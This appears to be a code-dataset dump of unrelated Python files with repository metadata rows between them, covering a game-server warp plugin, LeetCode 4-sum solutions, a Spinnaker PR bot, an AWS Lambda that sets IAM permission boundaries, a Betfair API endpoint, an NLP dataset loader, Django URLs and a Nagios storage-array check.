            return
        self.move_player_ship(
            self.factory.protocols[f.protocol], t.planet.split(':')
        )
        self.protocol.send_chat_message(
            'Warp drive engaged. Warping '
            '^yellow;{}^green; to ^yellow;{}^green;.'.format(
                from_player, to_player
            )
        )

    def warp_player_to_outpost(self, player_string):
        """Warp the named logged-in player to the outpost world."""
        self.logger.debug(
            'Warp player-to-outpost command called by %s: '
            'sending %s to the outpost',
            self.protocol.player.name, player_string
        )
        player_to_send = self.player_manager.get_logged_in_by_name(
            player_string
        )
        if player_to_send is not None:
            player_protocol = self.factory.protocols[player_to_send.protocol]
            warp_packet = build_packet(
                Packets.PLAYER_WARP,
                player_warp_toworld_write(
                    world_type=WarpWorldType.UNIQUE_WORLD,
                    destination='outpost'
                )
            )
            player_protocol.client_protocol.transport.write(warp_packet)
            self.protocol.send_chat_message(
                'Warped ^yellow;{}^green; to the outpost.'.format(
                    player_string
                )
            )
        else:
            self.protocol.send_chat_message(
                'No player by the name ^yellow;{}^green; found.'.format(
                    player_string
                )
            )
            self.protocol.send_chat_message(self.warp.__doc__)
| 36.83908 | 79 | 0.555174 | 9,156 | 0.952262 | 0 | 0 | 2,107 | 0.219137 | 0 | 0 | 1,643 | 0.170879 |
2197966d631c9c92b13301a3f1143b67b6729392 | 1,735 | py | Python | sum/4-sum-II.py | windowssocket/py_leetcode | 241dbf8d7dab7db5215c2526321fcdb378b45492 | [
"Apache-2.0"
] | 3 | 2018-05-29T02:29:40.000Z | 2020-02-05T03:28:16.000Z | sum/4-sum-II.py | xidongc/py_leetcode | 241dbf8d7dab7db5215c2526321fcdb378b45492 | [
"Apache-2.0"
] | 1 | 2019-03-08T13:22:32.000Z | 2019-03-08T13:22:32.000Z | sum/4-sum-II.py | xidongc/py_leetcode | 241dbf8d7dab7db5215c2526321fcdb378b45492 | [
"Apache-2.0"
] | 3 | 2018-05-29T11:50:24.000Z | 2018-11-27T12:31:01.000Z | # LTE using two pointers O(n**3)
class Solution(object):
def fourSumCount(self, A, B, C, D):
# corner case:
if len(A) == 0:
return 0
A.sort()
B.sort()
C.sort()
D.sort()
count = 0
for i in range(len(A)):
for j in range(len(B)):
k = 0
t = len(D) - 1
while 0 <= k < len(C) and 0 <= t < len(D):
if A[i] + B[j] + C[k] + D[t] > 0:
t -= 1
elif A[i] + B[j] + C[k] + D[t] < 0:
k += 1
else:
tmp1 = 1
tmp2 = 1
while 0 <= k < len(C) - 1 and C[k + 1] == C[k]:
k += 1
tmp1 += 1
while 1 <= t < len(D) and D[t - 1] == D[t]:
t -= 1
tmp2 += 1
count += tmp1 * tmp2
k += 1
t -= 1
return count
# hashmap Solution AC O(n**2)
class Solution(object):
    def fourSumCount(self, A, B, C, D):
        """
        Count index tuples (i, j, k, l) with A[i] + B[j] + C[k] + D[l] == 0.

        Records every pairwise sum a + b with its multiplicity, then for each
        pair (c, d) adds how many recorded sums equal -(c + d).
        O(n**2) time and space versus the O(n**4) brute force.

        :type A: List[int]
        :type B: List[int]
        :type C: List[int]
        :type D: List[int]
        :rtype: int
        """
        pair_sums = {}
        for a in A:
            for b in B:
                pair_sums[a + b] = pair_sums.get(a + b, 0) + 1
        total = 0
        for c in C:
            for d in D:
                total += pair_sums.get(-(c + d), 0)
        return total
219817d56a9878e2e56c8fd6d1d6e60bcea7971d | 1,693 | py | Python | event/filetype_check_pull_request_handler.py | micnncim/spinnakerbot | 449a1ba76c62619b515691dbd21f791f5f1d3e5b | [
"Apache-2.0"
] | null | null | null | event/filetype_check_pull_request_handler.py | micnncim/spinnakerbot | 449a1ba76c62619b515691dbd21f791f5f1d3e5b | [
"Apache-2.0"
] | null | null | null | event/filetype_check_pull_request_handler.py | micnncim/spinnakerbot | 449a1ba76c62619b515691dbd21f791f5f1d3e5b | [
"Apache-2.0"
] | null | null | null | from .handler import Handler
from .pull_request_event import GetPullRequest, GetRepo
# Template for the review comment posted on offending PRs; '{}' is filled
# with a markdown bullet list of the newly added Groovy files.
format_message = ('We prefer that non-test backend code be written in Java or Kotlin, rather ' +
                  'than Groovy. The following files have been added and written in Groovy:\n\n' +
                  '{}\n\n' +
                  'See our server-side [commit conventions here](https://www.spinnaker.io/community/contributing/back-end-code/#choice-of-language).')
class FiletypeCheckPullRequestHandler(Handler):
    """Comments on newly opened PRs that add non-test backend code in Groovy."""

    def __init__(self):
        super().__init__()
        # Repositories exempt from the check (taken from handler config).
        self.omit_repos = self.config.get('omit_repos', [])

    def handles(self, event):
        # Only react to freshly opened pull requests.
        return (event.type == 'PullRequestEvent'
                and event.payload.get('action') == 'opened')

    def handle(self, g, event):
        repo = GetRepo(event)
        if repo in self.omit_repos:
            self.logging.info('Skipping {} because it\'s in omitted repo {}'.format(event, repo))
            return

        pull_request = GetPullRequest(g, event)
        if pull_request is None:
            # BUGFIX-lite: logging.warn() is deprecated; use warning().
            self.logging.warning('Unable to determine PR that created {}'.format(event))
            return

        files = pull_request.get_files()
        # Collect newly added, non-test Groovy source files.
        bad_files = []
        for f in files:
            if not f.status == 'added':
                continue
            if not f.filename.endswith('.groovy'):
                continue
            if 'src/test' in f.filename:
                continue
            bad_files.append(f)

        if len(bad_files) > 0:
            pull_request.create_issue_comment(format_message.format(
                '\n\n'.join(map(lambda f: '* {}'.format(f.filename), bad_files))))

# NOTE(review): instantiating at import time presumably registers the handler
# with the event dispatcher - confirm against the Handler base class.
FiletypeCheckPullRequestHandler()
| 36.021277 | 140 | 0.606615 | 1,224 | 0.722977 | 0 | 0 | 0 | 0 | 0 | 0 | 462 | 0.272888 |
21995407ba2e718df75670c68ae5c377959bb276 | 96 | py | Python | venv/lib/python3.8/site-packages/virtualenv/create/via_global_ref/builtin/cpython/cpython3.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/virtualenv/create/via_global_ref/builtin/cpython/cpython3.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/virtualenv/create/via_global_ref/builtin/cpython/cpython3.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/8f/3e/26/6ee86ef4171b7194b098a053f1e488bca8ba920931fd5f9fb809ad9a37 | 96 | 96 | 0.895833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
21997f6cf26e1689e600188920ad6640d1b47a5e | 4,231 | py | Python | deployment/code/scp-03-Permission.py | weiping-bj/SCP-Workaround-in-AWS-ChinaRegions | f8feeed0fa568cf01b35e092681a975c5b7a8c54 | [
"MIT"
] | 1 | 2021-11-08T06:10:40.000Z | 2021-11-08T06:10:40.000Z | deployment/code/scp-03-Permission.py | weiping-bj/SCP-Workaround-in-AWS-ChinaRegions | f8feeed0fa568cf01b35e092681a975c5b7a8c54 | [
"MIT"
] | null | null | null | deployment/code/scp-03-Permission.py | weiping-bj/SCP-Workaround-in-AWS-ChinaRegions | f8feeed0fa568cf01b35e092681a975c5b7a8c54 | [
"MIT"
] | 1 | 2022-03-30T06:24:16.000Z | 2022-03-30T06:24:16.000Z | import json
import os
import boto3
topicArn = os.environ['TOPIC_ARN']
assumedRole = os.environ['ASSUMED_ROLE']
scpBoundary = os.environ['SCP_BOUNDARY_POLICY']
sns_client = boto3.client('sns')
sts_client = boto3.client('sts')
def lambda_handler(event, context):
print(event)
accountID = event['account']
assumeRoleARN = "arn:aws-cn:iam::" + accountID + ":role/" + assumedRole
Credentials = sts_client.assume_role(
RoleArn=assumeRoleARN,
RoleSessionName="LoginAccount",
DurationSeconds=900)
print(Credentials)
SCP_BOUNDARY = "arn:aws-cn:iam::" + accountID + ":policy/" + scpBoundary
if event['detail']['userIdentity']['type'] == "IAMUser":
Creator_Name = event['detail']['userIdentity']['userName']
Creator_Type = "USER"
elif event['detail']['userIdentity']['type'] == "AssumedRole":
Creator_Name = event['detail']['userIdentity']['sessionContext']['sessionIssuer']['userName']
Creator_Type = "ROLE"
# 判断,User 和 Role 分别处理
if event['detail']['eventName'] == "CreateUser":
identityArn, rspAction = processUser(event, SCP_BOUNDARY, Creator_Name, Creator_Type, Credentials)
Operation_Type="IAM User Creation"
elif event['detail']['eventName'] == "CreateRole":
identityArn, rspAction = processRole(event, SCP_BOUNDARY, Creator_Name, Creator_Type, Credentials)
Operation_Type="IAM Role Creation"
else:
print("Others")
# 发 SNS 通知消息
output = {
"Operation Type": Operation_Type,
"Identity ARN": identityArn,
"Creator Type": Creator_Type,
"Creator Name": Creator_Name,
"Respond Action": rspAction}
print(output)
sns_client.publish(
TopicArn=topicArn,
Subject=Operation_Type,
Message=json.dumps(output, indent=2))
return {
'statusCode': 200
}
def processRole(event, boundaryArn, creatorName, creatorType, Credentials):
    """Attach the permissions boundary and creator/trust tags to a new role.

    Returns a tuple of (role ARN, action string) for the SNS notification.
    """
    Role_Arn = event['detail']['responseElements']['role']['arn']
    # The role name is the last path segment of the ARN.
    Role_Name = Role_Arn.split('/')[-1]
    # IAM client using the temporary credentials assumed in the target account.
    iam_client = boto3.client(
        'iam',
        aws_access_key_id=Credentials['Credentials']['AccessKeyId'],
        aws_secret_access_key=Credentials['Credentials']['SecretAccessKey'],
        aws_session_token=Credentials['Credentials']['SessionToken'])
    iam_client.put_role_permissions_boundary(
        RoleName=Role_Name,
        PermissionsBoundary=boundaryArn
    )
    # Inspect the trust policy's FIRST statement only to classify the
    # trusted party for tagging.
    Role_Info = iam_client.get_role(RoleName=Role_Name)['Role']['AssumeRolePolicyDocument']['Statement'][0]['Principal']
    if "Federated" in Role_Info:
        trustedIdt = "Federated"
    elif "Service" in Role_Info:
        # NOTE(review): [-3] extracts the third-from-last dot part of the
        # service principal; verify this yields the service short name for
        # both *.amazonaws.com and *.amazonaws.com.cn principals.
        trustedIdt = Role_Info['Service'].split('.')[-3]
    else:
        # AWS principal ARN: colon-separated element 4 is the account id.
        trustedIdt = Role_Info['AWS'].split(':')[4]
    iam_client.tag_role(
        RoleName=Role_Name,
        Tags=[
            {
                'Key': 'Creator Name',
                'Value': creatorName
            },
            {
                'Key': 'Creator Type',
                'Value': creatorType
            },
            {
                'Key': 'Trusted Identi',
                'Value': trustedIdt
            }
        ]
    )
    Action="Tagged"
    return Role_Arn, Action
def processUser(event, boundaryArn, creatorName, creatorType, Credentials):
    """Attach the permissions boundary and creator tags to a new IAM user.

    Returns a tuple of (user ARN, action string) for the SNS notification.
    """
    user = event['detail']['responseElements']['user']
    user_name = user['userName']
    user_arn = user['arn']

    # IAM client using the temporary credentials assumed in the target account.
    creds = Credentials['Credentials']
    iam_client = boto3.client(
        'iam',
        aws_access_key_id=creds['AccessKeyId'],
        aws_secret_access_key=creds['SecretAccessKey'],
        aws_session_token=creds['SessionToken'])

    iam_client.put_user_permissions_boundary(
        UserName=user_name,
        PermissionsBoundary=boundaryArn)

    iam_client.tag_user(
        UserName=user_name,
        Tags=[
            {'Key': 'Creator Name', 'Value': creatorName},
            {'Key': 'Creator Type', 'Value': creatorType},
        ])

    return user_arn, "Tagged"
219a50648cf64b278567555f4d618a30757f4bc1 | 1,200 | py | Python | betfairlightweight/endpoints/navigation.py | rozzac90/betfair | de885adf308e48bfc2614df46a5375a7df6386ef | [
"MIT"
] | 1 | 2020-04-15T22:17:26.000Z | 2020-04-15T22:17:26.000Z | betfairlightweight/endpoints/navigation.py | rozzac90/betfair | de885adf308e48bfc2614df46a5375a7df6386ef | [
"MIT"
] | null | null | null | betfairlightweight/endpoints/navigation.py | rozzac90/betfair | de885adf308e48bfc2614df46a5375a7df6386ef | [
"MIT"
] | 1 | 2021-04-26T14:47:28.000Z | 2021-04-26T14:47:28.000Z | from requests import ConnectionError
from ..exceptions import APIError
from ..utils import check_status_code
from .baseendpoint import BaseEndpoint
class Navigation(BaseEndpoint):
    """
    Navigation operations.
    """

    def list_navigation(self, session=None):
        """
        Retrieve the full Betfair market navigation menu (served as a
        compressed file) via the Navigation Data for Applications service.

        :param requests.session session: Requests session object

        :rtype: json
        """
        return self.request(session=session)

    def request(self, method=None, params=None, session=None):
        """Issue the GET request and return the decoded JSON body.

        Uses the client's shared session when none is supplied; any
        transport failure is wrapped in APIError.
        """
        http = session or self.client.session
        try:
            response = http.get(
                self.url,
                headers=self.client.request_headers,
                timeout=(self.connect_timeout, self.read_timeout),
            )
        except ConnectionError:
            raise APIError(None, method, params, 'ConnectionError')
        except Exception as e:
            raise APIError(None, method, params, e)
        check_status_code(response)
        return response.json()

    @property
    def url(self):
        # Navigation has its own URI, distinct from the betting endpoints.
        return self.client.navigation_uri
| 30 | 85 | 0.66 | 1,048 | 0.873333 | 0 | 0 | 70 | 0.058333 | 0 | 0 | 308 | 0.256667 |
219aa4d5dddc72d3249a60a8339ee2344c7a1e6b | 3,733 | py | Python | datasets/fbp_dataset.py | Zumo09/Feedback-Prize | e7e7343a81bfec2f5b187f2266154da0bbe48fb9 | [
"MIT"
] | null | null | null | datasets/fbp_dataset.py | Zumo09/Feedback-Prize | e7e7343a81bfec2f5b187f2266154da0bbe48fb9 | [
"MIT"
] | null | null | null | datasets/fbp_dataset.py | Zumo09/Feedback-Prize | e7e7343a81bfec2f5b187f2266154da0bbe48fb9 | [
"MIT"
] | null | null | null | import os
from tqdm import tqdm
from functools import reduce
from typing import Dict, List, Callable, Tuple
import numpy as np
import pandas as pd
from sklearn.preprocessing import OrdinalEncoder
import torch
from torch.utils.data import Dataset
class FBPDataset(Dataset):
    """Training dataset: yields (document text, target dict, info dict).

    Targets hold ordinal-encoded discourse labels plus normalized
    (center, length) boxes over the document's whitespace tokens.
    """
    def __init__(
        self,
        documents: pd.Series,
        tags: pd.DataFrame,
        encoder: OrdinalEncoder,
        align_target: bool,
    ):
        # documents: id -> raw text; tags: rows of train.csv filtered by id
        # at access time; encoder: fitted on discourse_type categories.
        # align_target: use precomputed box columns instead of
        # predictionstring-derived boxes.
        self.documents = documents
        self.tags = tags
        self.encoder = encoder
        self.align_target = align_target

    def __len__(self):
        return len(self.documents)

    def __getitem__(self, index) -> Tuple[str, Dict, Dict]:
        doc_name = self.documents.index[index]
        # All tag rows belonging to this document.
        doc_tags = self.tags[self.tags["id"] == doc_name]  # type: ignore
        # Encode discourse types to class indices (LongTensor of shape [n]).
        tag_cats = (
            torch.Tensor(
                self.encoder.transform(
                    np.array(doc_tags["discourse_type"]).reshape(-1, 1)
                )
            )
            .squeeze()
            .long()
        )

        document = self.documents[doc_name]
        # Document length measured in whitespace-separated tokens.
        len_sequence = len(document.split())  # type: ignore
        if self.align_target:
            # Use the precomputed, already-normalized box columns.
            boxes = torch.Tensor(doc_tags[["box_center", "box_length"]].values)
        else:
            # Derive boxes from the predictionstring token indices.
            boxes = self.map_pred(doc_tags["predictionstring"], len_sequence)
        target = {"labels": tag_cats, "boxes": boxes}
        info = {"id": doc_name, "length": len_sequence}
        return document, target, info  # type: ignore

    @staticmethod
    def map_pred(pred, len_sequence):
        # Each predictionstring is a space-separated run of token indices;
        # convert it to a (center, length) box normalized by document length.
        tag_boxes = []
        for p in pred:
            p = p.split()
            p = [int(n) for n in p]
            p = torch.Tensor(p)
            tag_boxes.append([torch.mean(p) / len_sequence, p.size()[0] / len_sequence])
        return torch.Tensor(tag_boxes)
class FBPTestDataset(Dataset):
    """Inference dataset: yields (document text, info dict) pairs.

    Unlike FBPDataset there are no targets; `info` carries the document id
    and its whitespace-token length.
    """
    def __init__(
        self,
        documents: pd.Series,
        encoder: OrdinalEncoder,
    ):
        # documents: id -> raw text; encoder kept so callers can decode
        # predicted class indices with the same fitted categories.
        self.documents = documents
        self.encoder = encoder

    def __len__(self):
        return len(self.documents)

    def __getitem__(self, index) -> Tuple[str, Dict]:
        # BUGFIX (annotation only): this returns a 2-tuple; the previous
        # Tuple[str, Dict, Dict] annotation claimed a 3-tuple.
        doc_name = self.documents.index[index]
        document = self.documents[doc_name]
        len_sequence = len(document.split())  # type: ignore
        info = {"id": doc_name, "length": len_sequence}
        return document, info  # type: ignore
def load_test_texts(path: str, preprocess: List[Callable[[str], str]]) -> pd.Series:
    """Load the test-split documents into a Series indexed by document id.

    Each file's text is piped through the `preprocess` callables in order.
    """
    documents = {}
    for f_name in tqdm(os.listdir(path + "test/"), desc=f"Loading Test Dataset"):
        doc_name = f_name.replace(".txt", "")
        # with open(f_name, 'r') as f:
        # NOTE(review): filenames are listed from test/ but opened from
        # train/ - the commented-out line suggests this is deliberate
        # (train files reused under test ids); confirm before changing.
        with open(path + "train/" + f_name, "r") as f:
            # Apply the preprocessing pipeline left-to-right.
            text = reduce(lambda txt, f: f(txt), preprocess, f.read())
        documents[doc_name] = text

    return pd.Series(documents)  # type: ignore
def load_texts(
    path: str, preprocess: List[Callable[[str], str]], dataset_size: float
) -> Tuple[pd.Series, pd.DataFrame]:
    """Load training documents and their discourse tags.

    `dataset_size` below 1.0 keeps only that leading fraction of the files.
    Returns the documents as a Series keyed by id plus the train.csv tags.
    """
    file_names = os.listdir(path + "train/")
    if dataset_size < 1.0:
        file_names = file_names[: int(len(file_names) * dataset_size)]

    documents = {}
    for f_name in tqdm(file_names, desc=f"Loading Dataset"):
        # with open(f_name, 'r') as f:
        with open(path + "train/" + f_name, "r") as f:
            raw = f.read()
        # Apply the preprocessing pipeline left-to-right.
        documents[f_name.replace(".txt", "")] = reduce(
            lambda txt, fn: fn(txt), preprocess, raw
        )

    dtypes = {"discourse_id": "int64", "discourse_start": int, "discourse_end": int}
    tags = pd.read_csv(os.path.join(path, "train.csv"), dtype=dtypes)
    return pd.Series(documents), tags  # type: ignore
| 30.85124 | 88 | 0.595232 | 2,174 | 0.582373 | 0 | 0 | 320 | 0.085722 | 0 | 0 | 417 | 0.111706 |
219b49298771b09ffd76ddb885ed2c8ac603b1e4 | 614 | py | Python | mtw/fl_user/urls.py | sukumar1612/medical-transcription-website | 8ac2aaaec2e93a2f512e9f22fbf805c9c36a0d6d | [
"MIT"
] | 2 | 2021-05-24T06:08:41.000Z | 2021-05-26T19:21:01.000Z | mtw/fl_user/urls.py | sukumar1612/medical-transcription-website | 8ac2aaaec2e93a2f512e9f22fbf805c9c36a0d6d | [
"MIT"
] | null | null | null | mtw/fl_user/urls.py | sukumar1612/medical-transcription-website | 8ac2aaaec2e93a2f512e9f22fbf805c9c36a0d6d | [
"MIT"
] | 3 | 2021-05-22T11:37:30.000Z | 2021-06-01T08:34:01.000Z | from django.urls import path
from fl_user import views
app_name = 'fl_user'
urlpatterns = [
path('receive_data/',views.receive_data, name='receive_data'),
path('doctorhome/', views.doctorhome, name='doctorhome'),
path('fluhome/', views.fluhome, name='fluhome'),
path('sluhome/', views.sluhome, name='sluhome'),
path('view_task_flu/',views.view_task_flu,name="view_task_flu"),
path('view_task_doc/',views.view_task_doc,name="view_task_doc"),
path('view_task_slu/',views.view_task_slu,name="view_task_slu"),
path('generate_report/',views.generate_report,name="generate_report"),
]
| 36.117647 | 74 | 0.726384 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 229 | 0.372964 |
219b950bb1bd75ed87fec4ee388a2ee1d19a75cf | 4,350 | py | Python | check_purefa_hw.py | frank-m/nagios-plugins | 64681d8c89143f9deb9f3bd9a9c2d4e9bd040bb0 | [
"Apache-2.0"
] | null | null | null | check_purefa_hw.py | frank-m/nagios-plugins | 64681d8c89143f9deb9f3bd9a9c2d4e9bd040bb0 | [
"Apache-2.0"
] | null | null | null | check_purefa_hw.py | frank-m/nagios-plugins | 64681d8c89143f9deb9f3bd9a9c2d4e9bd040bb0 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2018, 2019, 2020 Pure Storage, Inc.
#
# * Overview
#
# This short Nagios/Icinga plugin code shows how to build a simple plugin to monitor Pure Storage FlashArrays.
# The Pure Storage Python REST Client is used to query the FlashArray.
#
# * Installation
#
# The script should be copied to the Nagios plugins directory on the machine hosting the Nagios server or the NRPE
# for example the /usr/lib/nagios/plugins folder.
# Change the execution rights of the program to allow the execution to 'all' (usually chmod 0755).
#
# * Dependencies
#
# nagiosplugin helper Python class library for Nagios plugins (https://github.com/mpounsett/nagiosplugin)
# purestorage Pure Storage Python REST Client (https://github.com/purestorage/rest-client)
"""Pure Storage FlashArray hardware components status
Nagios plugin to retrieve the current status of hardware components from a Pure Storage FlashArray.
Hardware status indicators are collected from the target FA using the REST call.
The plugin has three mandatory arguments: 'endpoint', which specifies the target FA, 'apitoken', which
specifies the autentication token for the REST call session and 'component', that is the name of the
hardware component to be monitored. The component must be specified using the internal naming schema of
the Pure FlashArray: i.e. CH0 for the main chassis, CH1 for the secondary chassis (shelf 1), CT0 for controller 0,
CT1 for controller 1, CH0.NVB0 for the first NVRAM module, CH0.NVB1 for the second NVRAM module, CH0.BAY0 for
the first flash module, CH0.BAY10 for the tenth flash module, CH1.BAY1, for the first flash module on the
first additional shelf,...
"""
import argparse
import logging
import logging.handlers
import nagiosplugin
import purestorage
import urllib3
class PureFAhw(nagiosplugin.Resource):
    """Pure Storage FlashArray hardware status

    Retrieves FA hardware component status
    """
    def __init__(self, endpoint, apitoken, component):
        # endpoint: FA hostname/IP; apitoken: REST session token;
        # component: FA internal component name (e.g. 'CT0', 'CH0.BAY1').
        self.endpoint = endpoint
        self.apitoken = apitoken
        self.component = component
        self.logger = logging.getLogger(self.name)
        # Errors go to the local syslog socket so they don't pollute the
        # plugin's stdout, which Nagios parses.
        handler = logging.handlers.SysLogHandler(address = '/dev/log')
        handler.setLevel(logging.ERROR)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        handler.setFormatter(formatter)
        self.logger.addHandler(handler)

    @property
    def name(self):
        # Used as both the logger name and the check name in output.
        return 'PURE_FA_HW_' + str(self.component)

    def get_status(self):
        """Gets hardware element status from flasharray."""
        # The FA endpoint typically has a self-signed certificate.
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        fainfo={}
        try:
            fa = purestorage.FlashArray(self.endpoint, api_token=self.apitoken)
            fainfo = fa.get_hardware(component=self.component)
            fa.invalidate_cookie()
        except Exception as e:
            # On any REST failure: log it and fall through with an empty
            # dict, so probe() yields no metric for this component.
            self.logger.error('FA REST call returned "%s" ', e)
        return(fainfo)

    def probe(self):
        # Map component status onto a 0/1 metric: 0 = ok, anything else = 1.
        # The '@1:1' context set up in main() turns a 1 into CRITICAL.
        fainfo = self.get_status()
        status = fainfo.get('status')
        name = fainfo.get('name')
        if (status == 'not_installed') or (name != self.component):
            # Component absent or lookup failed: report no metric at all.
            return []
        if (status == 'ok'):
            metric = nagiosplugin.Metric(self.component + ' status', 0, context='default' )
        else:
            metric = nagiosplugin.Metric(self.component + ' status', 1, context='default')
        return metric
def parse_args():
    """Parse command-line arguments.

    Positional: endpoint, apitoken, component. Optional: -v/--verbose
    (repeatable) and -t/--timeout in seconds.
    """
    argp = argparse.ArgumentParser()
    argp.add_argument('endpoint', help="FA hostname or ip address")
    argp.add_argument('apitoken', help="FA api_token")
    argp.add_argument('component', help="FA hardware component")
    argp.add_argument('-v', '--verbose', action='count', default=0,
                      help='increase output verbosity (use up to 3 times)')
    # BUGFIX: without type=int a user-supplied timeout arrived as a str while
    # the default was the int 30, breaking the numeric timeout handling.
    argp.add_argument('-t', '--timeout', default=30, type=int,
                      help='abort execution after TIMEOUT seconds')
    return argp.parse_args()
@nagiosplugin.guarded
def main():
    # Build the check around the FA hardware resource with a context that
    # flags a metric value of 1 as critical ('@1:1' = critical inside 1..1).
    args = parse_args()
    check = nagiosplugin.Check( PureFAhw(args.endpoint, args.apitoken, args.component) )
    check.add(nagiosplugin.ScalarContext('default', '', '@1:1'))
    check.main(args.verbose, args.timeout)

if __name__ == '__main__':
    main()
| 39.189189 | 117 | 0.691494 | 1,675 | 0.385057 | 0 | 0 | 334 | 0.076782 | 0 | 0 | 2,273 | 0.522529 |